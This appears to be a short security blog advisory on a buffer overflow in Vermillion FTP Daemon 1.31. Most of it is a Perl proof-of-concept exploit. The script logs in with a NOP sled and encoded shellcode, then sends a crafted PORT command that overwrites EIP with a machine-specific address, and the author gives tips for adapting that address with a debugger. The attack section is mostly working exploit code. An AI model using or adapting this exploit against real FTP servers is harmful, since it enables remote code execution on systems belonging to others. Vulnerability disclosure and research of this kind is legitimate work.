Vermillion FTP Daemon 1.31 is a FTP Server product from arcanesoft.com which is a basic ftp server. VFTPD consistently receives rave reviews and its thousands of loyal users  around the world agree that it has an unbeatable combination of high efficiency and security, reliable and robust operation, and easy configuration. VFTPD is a low cost, low maintenance solution for public Internet file servers, remote access services, or as a replacement for EDI providers.

As you might have guessed yes i am new to the team. And i have an interesting bug for you. I certainly enjoyed analyzing it.
So an attacker is able to control the EIP by sending specific values when sending the custom PORT command.
Due the fact of the special crafted command you only have control over the EIP and because of the comma’s the rest of the buffer is unusable. This makes the approach to running code in this bug machine specific. For demonstration …
Use this perl file to crash it. (If the machine specific address is corrected it should open notepad on the system)

#!/usr/bin/perl
use Net::FTP;
$host = @ARGV[0];
if ($host)
{
print “\nVFTPD 1.31 – PoC (code execution machine specific Exploit\nX4lt\n”;
$ftp = Net::FTP->new($host, Debug => 0);

#ok so now off 2 build the address
#so as stated its machine specific

$var1 = “92000000,”x46;
$var2 = “92000000,”;
#This will become EIP (Machine specific) => 0047380C
$var3 = “92000012,”; #                                              0C
$var4 = “92030008,”; #                                          38
$var5 = “92040007,”; #                                      47
$var6 = “92000000,”; #                                 00
$var7 = “2″;

$buff = $var1.$var2.$var3.$var4.$var5.$var6.$var7;

$np = “\x90″ x 200;
#find the shellcode addres in ur favorite debugger.
$sc = “\xda\xde\xb8\xb8\x7f\xc3\xb5\x31\xc9\xb1\x33\xd9\x74\x24″ .
“\xf4\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\x4d\x83″ .
“\x2b\x3c\xad\x7c\xac\x5f\x24\x99\x9d\x4d\x52\xe9\x8c\x41″ .
“\x11\xbf\x3c\x29\x77\x54\xb6\x5f\x5f\x5b\x7f\xd5\xb9\x52″ .
“\x80\xdb\x05\x38\x42\x7d\xf9\x43\x97\x5d\xc0\x8b\xea\x9c” .
“\x05\xf1\x05\xcc\xde\x7d\xb7\xe1\x6b\xc3\x04\x03\xbb\x4f” .
“\x34\x7b\xbe\x90\xc1\x31\xc1\xc0\x7a\x4d\x89\xf8\xf1\x09″ .
“\x29\xf8\xd6\x49\x15\xb3\x53\xb9\xee\x42\xb2\xf3\x0f\x75″ .
“\xfa\x58\x2e\xb9\xf7\xa1\x77\x7e\xe8\xd7\x83\x7c\x95\xef” .
“\x50\xfe\x41\x65\x44\x58\x01\xdd\xac\x58\xc6\xb8\x27\x56″ .
“\xa3\xcf\x6f\x7b\x32\x03\x04\x87\xbf\xa2\xca\x01\xfb\x80″ .
“\xce\x4a\x5f\xa8\x57\x37\x0e\xd5\x87\x9f\xef\x73\xcc\x32″ .
“\xfb\x02\x8f\x58\xfa\x87\xaa\x24\xfc\x97\xb4\x06\x95\xa6″ .
“\x3f\xc9\xe2\x36\xea\xad\x13\xc6\x26\x38\x83\x71\xd3\x01″ .
“\xc9\x81\x0e\x45\xf4\x01\xba\x36\x03\x19\xcf\x33\x4f\x9d” .
“\x3c\x4e\xc0\x48\x42\xfd\xe1\x58\x2c\x6e\x6a\x06\xc0\x11″ .
“\xf6\xe6\x45\xaa\x93\xf6″;

$np2 = “\x90″ x 30;
$sc = $np.$sc.$np2;
$ftp->login($sc,”);
sleep(2);
$ftp->port($buff);

}
else {
print “\nVFPTD 1.31 – PoC Exploit\nX4lt\n\n- Usage: $0 host\n”;
}

Now after u run the Perl script against the application your EIP would be the value u crafted in Perl script.
In this case 0047380C. As u can also see in this windbg picture …

To find your specific address i would recommend using your favorite debugger and see where the shellcode ends up. That’s all for now.

Advisory: Vermillion FTP Deamon v1.31 – Buffer Overflow Vulnerability

[Writer: ~x4lt]